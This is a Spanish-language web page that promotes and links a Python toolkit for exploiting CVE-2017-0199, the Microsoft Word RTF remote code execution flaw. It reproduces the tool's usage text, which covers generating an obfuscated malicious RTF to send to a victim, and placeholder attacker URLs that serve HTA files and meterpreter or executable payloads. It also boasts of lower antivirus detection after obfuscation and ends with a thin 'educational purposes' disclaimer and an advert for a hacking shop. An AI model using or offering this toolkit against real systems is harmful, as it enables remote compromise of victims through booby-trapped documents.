Explotar Windows con archivo de word rtf CVE-2017-0199 [ Video tutorial]

0
3485
views

Exploit CVE-2017-0199 – v3.0 es un práctico script de python que proporciona una forma rápida y eficaz de explotar Microsoft RF RTF. Puede generar un archivo malicioso (Obfuscated) RTF y entregar metasploit / meterpreter / otro payload a la víctima sin ninguna configuración compleja.

Tasa de detección antes de la ofuscación

Tasa de detección después de la ofuscación

Comandos y argumentos

# python cve-2017-0199_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)

Modes:

-M gen                                          Generate Malicious RTF file only

     Generate malicious RTF file:

      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

      -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where        this                                          tool is running.
                                      For example, http://attackerip.com/test.hta (This URL will be included in 	                                              malicious RTF file and will be requested once victim will open malicious RTF file.
      -x 0|1  (default = 0)               Generate obfuscated RTF file. 0 = Disable, 1 = Enable.

				      
-M exp                                          Start exploitation mode

     Exploitation:
 
      -H </tmp/custom.hta>                Local path of a custom HTA file which needs to be delivered and executed on target.
                                          NOTE: This option will not deliver payloads specified through options "-e" and "-l"
					  
      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).

Video


video por Team Whoami

Descarga CVE-2017-0199

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop